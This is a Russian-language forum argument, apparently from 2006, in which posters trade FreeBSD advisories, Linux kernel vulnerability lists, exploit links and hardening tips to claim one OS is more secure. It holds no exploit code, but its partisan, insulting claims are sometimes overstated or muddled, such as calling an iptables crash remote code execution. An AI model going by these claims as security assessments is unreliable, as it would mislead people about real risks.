А во фре куча УДАЛЕННЫХ уязвимостей, которые не зависсят от наличия о злоумышленника шелла на машине, за какие-то последние НЕСКОЛЬКО МЕСЯЦЕВ(а не то, что ты привел по линуксу за несколько последних ЛЕТ), при чем есть REMOTE ROOT в WIFI FreeBSD-SA-06:05.80211, который ты почему-то в упор не заметил, такие дела: твою дырявую фрю можно удаленно порутать через дырявое ядро. А то что ты не наблюдаешь эксплоит на паблике не означает того, что эксплоита нет. Ты ведь и локальный ROOT-эксплоит эксплоит к дырявому ядру фри на FreeBSD-SA-04:02.shmat не наблюдаешь, а он есть, как и на последнюю дыру в сендмайле FreeBSD-SA-06:13.sendmail дырявой фрибсд.
Опять ты слова из воздуха берёшь?
FreeBSD - это крепость, в отличие от дырявого помойного болота linux.
REMOTE ROOT в WIFI FreeBSD-SA-06:05.80211
Ну во-первых WIFI сети IEEE 802.11 встречаются довольно редко, ни на большинстве домашних компьютеров, ни на большинстве серверов не стоит такое ПО.
Мало того:
An integer overflow in the handling of corrupt IEEE 802.11 beacon or
probe response frames when scanning for existing wireless networks can
result in the frame overflowing a buffer.

Всё это потенциально возможно, но на практике, как мы с тобой знаем, никто так и смог сделать эксплоит и грош цена этой "уязвимости".

Далее- FreeBSD-SA-04:02.shmat
Это дыра от 15 февраля 2004 года, её уже более 2ух лет :)
Если ты хочешь брать эксплоиты такой давности, то вспомни про
Local Root эксплоиты линукса mremap1, mremap2, munmap, do_brk, uselib, kmod.

Теперь FreeBSD-SA-06:13.sendmail
Это разве ядро? Что тебе даст это дыра? То что когда ты будешь отправлять письмо через  sendmail, то засчёт этой уязвимости ты сможешь выполнить любой код от самого же себя? А какой толк от приобретения привелегий, которыми ты уже обладаешь.

Короче всё что ты перечислил на нормальных серверах использовать не удастся и толку от таких уязвимостей ноль, поэтому и эксплоитов под большинство из них в паблике нету, они просто бесполезны.
Ах да, не надо мне тут гнать про удалённую уязвимость в MS05-19 (удаленное выполнение кода), так как фильтр на rawsocket блокирует такой пакет ещё до того, как он обработается. Так что твоя уязвимость удаленная против прямых рук бесполезна.
А вот удаленное выполнение кода в iptables (Description: integer overflow causes kernel crash if logging is enabled.), тут как раз прямые руки не помогут, потому что логи iptables пишут большинство админов и чем секьюрнее они хотят сделать систему, тем больше логов они предпочитают писать, но вот эти логи оборачиваются против них. Через дырявую iptables дырявого линуксятника их удаленно имеют по самое не хочу.

Что касается включенного ICF - по умолчанию он включен и в XP (не только в SP2) и в 2k3 (не только в SP1), просто пользователи часто его не подключают к ras-подключению.

Твои перечисленные дыры в RPC, RPC2, LSASS опять же не работают с ICF.
Так как просто невозможно соединится с 135, 137-139, 445 портами.
Что касается фикса на серверах, то я уже перечислял способы фикса -
Цитирую одно из своих старых сообщений:

Нормальные люди знают, что RPCSS вещь очень функциональная следовательно весьма не безопасная, и поэтому фильтруют доступ к рпц и разрешают его только для определенных адресов или запрещают сетевой доступ к нему вообще.
Кстати есть маленький секрет, нужно запретить доступ Network Service к DCOM_RemoteGetClassObject, сделать это можно через стандартную comexp.msc

Я же в своё время сделал намного проще, разрешал доступ к EPMAP только для локальной прокси (вход на которую, разумеется, закрыт паролем) и определенных её портов. И через эту проксю я всегда и пользовался RPC, да и делаю так по сей день.

А вот линуксятина твоя имеется удалённо через iptables, так как логи пишут большинство администраторов.
Так же линуксятник во времена RPC багов (которые легко фиксятся или вообще не работают с ICF) имелся через уже перечисленные мною
Local Root эксплоиты линукса mremap1, mremap2, munmap, do_brk, uselib, kmod.

А свежие линуксятники имеются по полной программе - через одних только 8 паблик эксплоитов под ядро (в конце сообщения я покажу, что в ядре линукса сотни свежих уязвимостей, и тогда мы добавим ещё вероятное существование приватных эксплоитов - а пока буду говорить только о пабликах)
Linux Kernel Socket Buffer Memory Exhaustion DoS Exploit - http://security.nnov.ru/Fnews568.html
linux kernel msync race condition - http://security.nnov.ru/Enews925.html
exploit to Linux Vulnerability Allows Non-Privileged Users to Read Kernel Memory - http://security.nnov.ru/news4494.html
Linux kernel multiple bugs exploits and patches - http://security.nnov.ru/news4337.html
А вот паблики с секлаба:
Linux Kernel <= 2.6.11-rc3 Local Proof of Concept Exploit - http://www.securitylab.ru/poc/222131.php
Linux Kernel 2.6.11 sys_epoll_wait Local integer overflow Exploit - http://www.securitylab.ru/poc/222142.php
Linux Kernel "binfmt_elf" Core Dump Local Buffer Overflow Exploit - http://www.securitylab.ru/poc/222175.php
Linux Kernel 2.6.x "ioctl_by_bdev()" Local Denial of Service PoC Exploit - http://www.securitylab.ru/poc/222179.php
и так далее...

Цитата

Гость писал:

Как все сложно то - дружественная система для домохозяек требует лазить в консоли, прямо как в Linux, полу-GUI полуконсольный гибрид какой-то и после этого еще кто-то говорит о дружественности системы к простому пользователю
Я уже сказал, что Windows могут пользоваться, как профессионалы, так и домохозяйки.
Последние просто не будут использовать 99% возможностей.
И Windows - не полуконсольный гирбид, это у тебя полукривой мозг :)
Windows поддерживает управление большинством функций И через консоль И через гуи.
Но я тебе не виню, ты ведь показал, что знаешь Windows ещё хуже, чем домохозяйка, когда заявил что netsh нельзя заменить гуём,  а такие замены есть, и во многом это оснастки MMC.

Цитата

Гость писал:

Для фрибсд большинство эксплоитов традиционно не выкладывают в паблик. Например FreeBSD local root на дырявое ядро фри, shmat.c - попробуй отыскать. А эксплоит на sendmail думаешь тоже миф? Эксплоит еще одну дыру в ядре FreeBSD-SA-05:02.sendfile валяется в паблике.
1. FreeBSD local root на дырявое ядро фри - ты как то, в общем, назвал сказку, а по конкретнее нельзя уточнить, в чём дырка-то?
2. shmat.c - Этой дыре более 2ух лет.
С ней можно сравнить эксплоиты линуксятника mremap1, mremap2, munmap, do_brk, uselib, kmod, итд...
3. sendmail - ну и что тебе он даст, то что ты сможешь со своими же привелегиями выполнить код? Кстати никакого эксплоита в паблике не валяется, а если приватный и есть, то он бесполезен.
4. "Эксплоит еще одну дыру в ядре FreeBSD-SA-05:02.sendfile валяется в паблике. "
А что первый sendmail - ты от 2003 года чтоль взял? Хех, она уже давно нигде не работает. Кстати последнюю уязвимость FreeBSD-SA-05:02.sendfile я описал пунктом выше - она бесполезна.

Ты мне перечислил всего 7-8 уязвимостей в ядре FreeBSD из которых только 1 (kmem) имеет реализацию публичным эксплоитом.
Я же тебе перечислил в одном только ядре линукса порядка восьми эксплоитов.

Но не перечислил все дырки ядра linux (из которых можно сделал вывод, о наличие большого числа приватных эксплоитов под них), давай я это сделаю. Главное смотри на даты, все за 2006 год только.

Итак, дырки в ядре линуксятины:


1 Linux Kernel SYSFS PAGE_SIZE Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-04-07 00:00:00 PDT
   URL: http://www.securityfocus.com/bid/17402

2 Linux Kernel NFS Client Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-23 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16922

3 Linux Kernel XFS File System Local Information Disclosure Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-23 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16921

4 Linux Kernel ELF File Entry Point Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-23 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16925

5 Linux Kernel Sysctl Unregistration Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-23 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15365

6 Linux Kernel ATM Module Inconsistent Reference Counts Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-23 00:00:00 PST
   URL: http://www.securityfocus.com/bid/17078

7 Linux Kernel Get_Compat_Timespec and PTrace Local Denial Of Service Vulnerabilities (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-23 00:00:00 PST
   URL: http://www.securityfocus.com/bid/17216

8 Linux Kernel die_if_kernel Local Denial of Service Vulnerability (Vulnerabilities) Rank: 485
   Last modified on: 2006-03-23 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16993

9 Linux Kernel sys_mbind System Call Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-23 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16924

10 Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities (Vulnerabilities) Rank: 485
   Last modified on: 2006-03-23 00:00:00 PST
   URL: http://www.securityfocus.com/bid/17203

11 Linux Kernel 64-Bit SMP Routing_ioctl() Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-23 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14902

12 Linux Kernel Security Key Functions Local Copy_To_User Race Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-23 00:00:00 PST
   URL: http://www.securityfocus.com/bid/17084

13 Linux Kernel Netfilter Do_Replace Local Buffer Overflow Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-22 00:00:00 PST
   URL: http://www.securityfocus.com/bid/17178

14 Linux Kernel Raw_sendmsg() Kernel Memory Access Vulnerability (Vulnerabilities) Rank: 485
   Last modified on: 2006-03-21 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14787

15 Linux Kernel ZLib Invalid Memory Access Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-17 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14719


16 Linux Kernel EXT2/EXT3 File System Access Control Bypass Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-17 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14793

17 Linux Kernel SYS_GET_THREAD_AREA Information Disclosure Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-17 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15527

18 Linux Kernel IA32 ExecVE Local Buffer Overflow Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-16 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14205

19 Linux Kernel Console Keymap Local Command Injection Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-16 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15122

20 Linux Kernel NAT Handling Memory Corruption Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-16 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15531

21 Linux Kernel IP ID Information Disclosure Weakness (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-16 00:00:00 PST
   URL: http://www.securityfocus.com/bid/17109

22 Linux Kernel ELF Core Dump Local Buffer Overflow Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-16 00:00:00 PST
   URL: http://www.securityfocus.com/bid/13589

23 Linux Kernel DM-Crypt Local Information Disclosure Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-10 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16301

24 Linux Kernel ProcFS Kernel Memory Disclosure Vulnerability (Vulnerabilities) Rank: 485
   Last modified on: 2006-03-02 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16284

25 Linux Kernel PROC Filesystem Local Information Disclosure Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-02 00:00:00 PST
   URL: http://www.securityfocus.com/bid/11937

26 Linux Kernel NFS ACL Access Control Bypass Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-02 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16570

27 Linux Kernel handle_stop_signal Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-02 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16856

28 Linux Kernel SET_MEMPOLICY Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-02 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16135

29 Linux Kernel ICMP_Push_Reply Remote Denial Of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-02 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16044

30 Linux Kernel IP6_Input_Finish Remote Denial Of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-02 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16043


31 Linux Kernel INVALIDATE_INODE_PAGES2 Local Integer Overflow Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-02 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15846

32 Linux Kernel Find_Target Local Denial Of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-02 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14965

33 Linux Kernel mq_open System Call Unspecified Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-03-02 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16283

34 Linux Kernel SDLA_XFER Kernel Memory Disclosure Vulnerability (Vulnerabilities) Rank: 485
   Last modified on: 2006-02-23 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16759

35 Linux Kernel IPv6 FlowLable Denial Of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-22 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15729

36 Linux Kernel IP_VS_CONN_FLUSH Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-22 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15528

37 Linux Kernel SDLA IOCTL Unauthorized Local Firmware Access Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-22 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16304

38 Linux Kernel Stack Fault Exceptions Unspecified Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-22 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14467

39 Linux Kernel Sendmsg() Local Buffer Overflow Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-17 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14785

40 Linux Kernel DVB Driver Local Buffer Overflow Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-17 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16142

41 Linux Kernel ICMP_Send Remote Denial Of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-17 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16532

42 Linux Kernel IPV6 Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-17 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15156

43 Linux Kernel Sysctl_String Local Buffer Overflow Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-17 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16141

44 Linux Kernel Multiple Vulnerabilities (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-10 00:00:00 PST
   URL: http://www.securityfocus.com/bid/12598

45 Linux Kernel SNMP Handler Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-09 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14611


46 Linux Kernel IPSec Policies Authorization Bypass Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-09 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14609

47 Linux Kernel ISO File System Denial Of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-09 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14614

48 Linux Kernel FIB_LOOKUP Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-09 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16139

49 Linux Kernel Device Driver Virtual Memory Flags Unspecified Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-07 00:00:00 PST
   URL: http://www.securityfocus.com/bid/12338

50 Linux Kernel EXT2 File System Information Leak Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-07 00:00:00 PST
   URL: http://www.securityfocus.com/bid/12932

51 Linux Kernel Coda_Pioctl Local Buffer Overflow Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-07 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14967

52 Linux Kernel PTrace CLONE_THREAD Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-07 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15642

53 Linux Kernel POSIX Timer Cleanup Handling Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-07 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15722

54 Linux Kernel Multiple Security Vulnerabilities (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-07 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16414

55 Linux Kernel SEARCH_BINARY_HANDLER Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-07 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16320

56 Linux Kernel do_coredump Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-07 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15723

57 Linux Kernel File Lock Lease Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-07 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15745

58 Linux Kernel Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-07 00:00:00 PST
   URL: http://www.securityfocus.com/bid/12837

59 Linux Kernel BINFMT_ELF Loader Local Privilege Escalation Vulnerabilities (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-07 00:00:00 PST
   URL: http://www.securityfocus.com/bid/11646

60 Linux Kernel PTraced Child Auto-Reap Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-07 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15625

61 Linux Kernel Time_Out_Leases PrintK Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-02-07 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15627

62 Linux Kernel Multiple Security Vulnerabilities (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-17 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15049

63 Linux Kernel SCSI ProcFS Denial Of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-17 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14790

64 SuSE Linux Kernel Unauthorized SCSI Command Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-17 00:00:00 PST
   URL: http://www.securityfocus.com/bid/11784

65 Linux Kernel Multithreaded ITimer Leak Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-16 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15533

66 Linux Kernel Multiple Memory Leak Local Denial Of Service Vulnerabilities (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-16 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15076

67 GRSecurity Elevated Service Privileges Weakness (Vulnerabilities) Rank: 118
   Last modified on: 2006-01-16 00:00:00 PST
   URL: http://www.securityfocus.com/bid/16261

68 Linux Kernel USB Subsystem Local Denial Of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-13 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14955

69 Linux Kernel Radionet Open Source Environment Unspecified Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-12 00:00:00 PST
   URL: http://www.securityfocus.com/bid/13886

70 Linux Kernel 64 Bit Multiple Unspecified Local Denial of Service Vulnerabilities (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-12 00:00:00 PST
   URL: http://www.securityfocus.com/bid/13904

71 Linux Kernel XFRM Array Index Buffer Overflow Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-12 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14477

72 Linux Kernel Non-Zero Keyring Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-12 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14517

73 Linux Kernel Session Keyring Allocation Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-12 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14521

74 Linux Kernel World Writable SYSFS DRM Debug File Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-12 00:00:00 PST
   URL: http://www.securityfocus.com/bid/15154

75 Linux Kernel ZLib Local Null Pointer Dereference Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-12 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14720

76 Linux Kernel Netfilter Ipt_recent Remote Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-12 00:00:00 PST
   URL: http://www.securityfocus.com/bid/14791

77 Linux Kernel SCSI IOCTL Integer Overflow Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-11 00:00:00 PST
   URL: http://www.securityfocus.com/bid/12198

78 Linux Kernel Netfilter Memory Leak Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-11 00:00:00 PST
   URL: http://www.securityfocus.com/bid/12816

79 Multiple Linux Kernel IOCTL Handlers Local Memory Corruption Vulnerabilities (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-11 00:00:00 PST
   URL: http://www.securityfocus.com/bid/13651

80 Linux Kernel SYSFS_Write_File Local Integer Overflow Vulnerability (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-11 00:00:00 PST
   URL: http://www.securityfocus.com/bid/13091

81 Linux Kernel Multiple Local Vulnerabilities (Vulnerabilities) Rank: 418
   Last modified on: 2006-01-11 00:00:00 PST
   URL: http://www.securityfocus.com/bid/11956


А теперь давай представим, какое количество приватных эксплоитов существует на эти дырки в линуксе.
А ведь во freebsd дырки можно сосчитать по пальцам и за 2005 и за 2006 год вместе, а в линуксятине их сотни за один только 2006 год, и я уже перечислил их выше.
Если я начну перечислять за 2005 год, то их будет ещё несколько сотен.

Кстати, вот тебе свеженький remote (2006 года) Linux Kernel ICMP_Push_Reply RemoteDenial Of Service
И уж наверняка под неё есть приватный эксплоит, так как даже название уязвимости упоминает о возможности Remote DoS, а не просто баг, с потенциальной возможностью.
А вот тебе ещё Remote (2006) -  Linux Kernel IP6_Input_Finish Remote Denial Of Service Vulnerability (Vulnerabilities)  
Или ещё Remote (2006) - Linux Kernel ICMP_Send Remote Denial Of Service Vulnerability (Vulnerabilities)  
Ещё? Пожалуйста,  (2006) Linux Kernel Netfilter Ipt_recent Remote Denial of Service Vulnerability (Vulnerabilities)  
Хочешь дырку в GRSEC ? -  (2006) GRSecurity Elevated Service Privileges Weakness (Vulnerabilities)  
Интересно что она и Remote: Yes и Local: Yes
И всё это только за 2006 год без учёта 2005ого!
А ведь это чистый список уязвимостей без каких-либо дублей.
Сотни дыр в ядре линукса... Это не ядро. Это, как ты выразился, футбольные ворота.

линукс это решето по сравнению с FreeBSD и NT.
 
Цитата
Хренсмаслом пишет:
нужно чтобы сервер, на который зайдёт пользователь (а скорее всего это будет хттп-сервер) в ответном запросе послал гадкий пакет на открытый порт этой же tcp сессии, но такое трудноосуществимо.
и что в этом трудноосуществимого?
Цитата
Хренсмаслом пишет:
Тогда они посредствам дырки в каком либо скрипте, как я уже писал, получают заветное nobody, после чего радостно кладут машину.
вас послушаешь, так в каждом скрипте есть дырка с remote command execution. Только вот надо ещё залить сплоит на сервер, скомпилировать и, о ужас, запустить. А теперь ответьте на вопросы:
1)кто позволит несчастному nobody запустить /usr/bin/echo?
2)кто позволит несчастному nobody запустить /usr/bin/wget?
3)кто позволит несчастному nobody запустить /usr/bin/gcc?
4)кто позволит несчастному nobody писать куда-то кроме /tmp ?
5)кто позволит кому бы то ни было запустить что-то из /tmp, если оно смонтировано с noexec?

Цитата
Хренсмаслом пишет:
Есть ещё публичный и на local root, например, linuxmsyncex.c
клик
Цитата
Workaround/Fix:


use grsec
сюрприз, да?
Цитата
Хренсмаслом пишет:
Популярные стандартные демоны, которые запускаются с привилегированными правами на большинстве хостинговых серверов.
примеры? убийственное шлимыло, которое нормальные админы заменяют на postfix или exim?
Цитата
Хренсмаслом пишет:
И касательно даемонов я прав, я перечислил только баги ядра линукса и эксплоиты под них, а если начать перечислять популярные даемоны линукса, то узявимостей будет намного больше.
А чем так разительно отличаются демоны в линухе от демонов во freebsd? Может дырявое шлимыло перестанет быть таковым? Или уязвимая под linux версия wu-ftpd под freebsd станет неуязвима?
Цитата
Хренсмаслом пишет:
Единственное что увеличивается пропорционально размеру кода - это кол-во потенциальных дыр в нём :)
Обьём кода windows много больше чем ядра Linux.
Цитата
Хренсмаслом пишет:
Просто у Windows функциональность по умолчанию намного выше, в отличие от систем для подростков-хакирей.
Так где же эта функциональность? Где эти фантастические возможности?
как насчёт двух каналов и двух локальных сетей? И что насчёт двух статических маршрутов с одинаковой метрикой?
Как насчёт load balancing? Или может carp?
Цитата
Хренсмаслом пишет:
Кстати для grsec есть свежая уязвимость от 2006 года - http://www.securityfocus.com/bid/16261
вы в смысл уязвимости вчитываетесь, или просто линки кидаете? Для этого должен быть настроен rsbac. После того как администратор настраивает роль некоего сервиса адмистративная роль не сбрасывается. Т.е. чтобы воспользоваться данной уязвимостью надо сломать сервис, роль которого только что настраивал администратор. Если же сервер перезагружали, перевозили на техплощадку итп, то это вам ничего не даст.
Цитата
Хренсмаслом пишет:
А вот удаленное выполнение кода в iptables (Description: integer overflow causes kernel crash if logging is enabled.), тут как раз прямые руки не помогут, потому что логи iptables пишут большинство админов и чем секьюрнее они хотят сделать систему, тем больше логов они предпочитают писать, но вот эти логи оборачиваются против них. Через дырявую iptables дырявого линуксятника их удаленно имеют по самое не хочу.
бред. высосано из пальца. Для неиспользуемых портов - TARPIT. Логать неразумно, т.к. это потенциальный dos.
Насчёт остального бреда. Давайте так: я вам даю шелл на двух машинах с Linux. Ядра не самые свежие. Ваша задача: получить id=0, либо уложить local dos.
идёт?
PS: не стоит забывать, что Linux - это не только ia-32.
 
Цитата
Хренсмаслом пишет:
Единственная возможность обойти - это и нужно чтобы сервер, на который зайдёт пользователь (а скорее всего это будет хттп-сервер) в ответном запросе послал гадкий пакет на открытый порт этой же tcp сессии, но такое трудноосуществимо.
Взлом дырявой винды через WMF легкоосуществим и никакой виндовый DEP не поможет. :)

Цитата
Хренсмаслом пишет:
Что касается локал DoS, может хакирам и не надо получать рута, может им нужно просто положить сервер для какой-то цели (например, конкуренция), а может и без цели.
Вот они и положат твою дырявую фрю через одну из десятка свежайших дыр во фре - или устроят панику через NFS или словают через WIFI или уронят если не получится проломить, или SSH свалят или через IPSEC уронят, и с виндой тоже самое - через дыры в TCP/IP уронят или сломают.

Цитата
Хренсмаслом пишет:
Вот под фрю столько быть не может, так как уязвимостей там несравнимо меньше.
Угу их меньше, но они большинство удаленные, в т.ч. удаленное переполнение буфера в ядре(WIFI). =)

Цитата
Хренсмаслом пишет:
Действительно единственный кое-какой эксплоит под freebsd - это kmem(), ни DoS, ни рута вы через него не получите, а если у админа сложный пароль, то вы и его даже за 100 лет к хэшу не подберёте.
А если несложный то легко подберется, а если юзеров на хосте за сотню, то будет тебе массдефейс или несколько десятков акканутов на машину, чтобы ковырять фрю до рута спокойно, поэтому не надо ляля про несущественную опасность.

Цитата
Хренсмаслом пишет:
И касательно даемонов я прав, я перечислил только баги ядра линукса и эксплоиты под них, а если начать перечислять популярные даемоны линукса, то узявимостей будет намного больше.
Угу, только про порутание фри через cpanel, proftpd, samba, sendmail и "прочие популярные даемоны линукса"  не забудь.

Цитата
Хренсмаслом пишет:
Популярные стандартные демоны, которые запускаются с привилегированными правами на большинстве хостинговых серверов.
Популярные стандартные демоны запускаются под НЕПРИВИЛЕГИРОВАННЫМИ правами mysql, apache, nobody, mail, exim, mysql, named и т.д. Это ж не венда, у которой все под LOCAL SYSTEM идет, и стандартные дырявые сервисы и Exchange и ISA и MSSQL, да даже апач по умолчанию. )))

Цитата
Хренсмаслом пишет:
Ах да толку от твоего EFI не много - замена биоса.
Для тех, у кого с логикой туго, поясняю: толку много - отсутствие необходимости создавать драйвера под каждую конкретную ОС(что навсегда решит проблемы с отсутвием драйверов под FreeBSD, Solaris, Linux,...), отсутствие необходимости устанавливать эти драйвера.

Цитата
Хренсмаслом пишет:
Что касается Network File System - это уже даемон nfsd, но увы, он не особо популярный.
NFS реализован в ядре вообще-то, поэтому и ловит твоя дырявая фря удаленно кернелпаник. И что бы ты не рассказывал про неособую популярность, дыра тем не менее есть, удаленная DoS, которая стоит многих сотен локальных уязвимостей Linux.

Цитата
Хренсмаслом пишет:
Но cygwin более или менее нормально эмулирует линукс, а вот wine - это кривая и тормозная вещь, так как алгоритмы, которые были заложены в Wine были получены реверс инженерией и они не являются абсолютными.
Ну так и правильно 100% реализации и не будет, потому что мелкомягкая никому документации полной не дала и сейчас Еврокомиссия ее чехвостит ее и в хвост и  в гриву за нечестную конкуренцию, в т.ч. за непредоставление полной документации. Тем не менее большая часть функционала все-таки была реализована согласно открытой спецификации на Win32 API и работает неплохо, по пролетавшим тестам кое-где даже быстрее, чем винда.
На вон, погляди как 1С бегает под Linux-овым Wine со свистом, оставляя винду с нативным Win32API позади http://etersoft.ru/content/view/62/63/. )))

Цитата
Хренсмаслом пишет:
А что касается игрушек. Хех, интересно как это ты в них играешь на 1 fps, которые выдаёт Wine и уж тем более, если там используется DirectX.
В Starcraft(DirectX) и HalfLife+CounterStrike(OpenGL) на нормальных fps-ах под cedega.

Цитата
Хренсмаслом пишет:
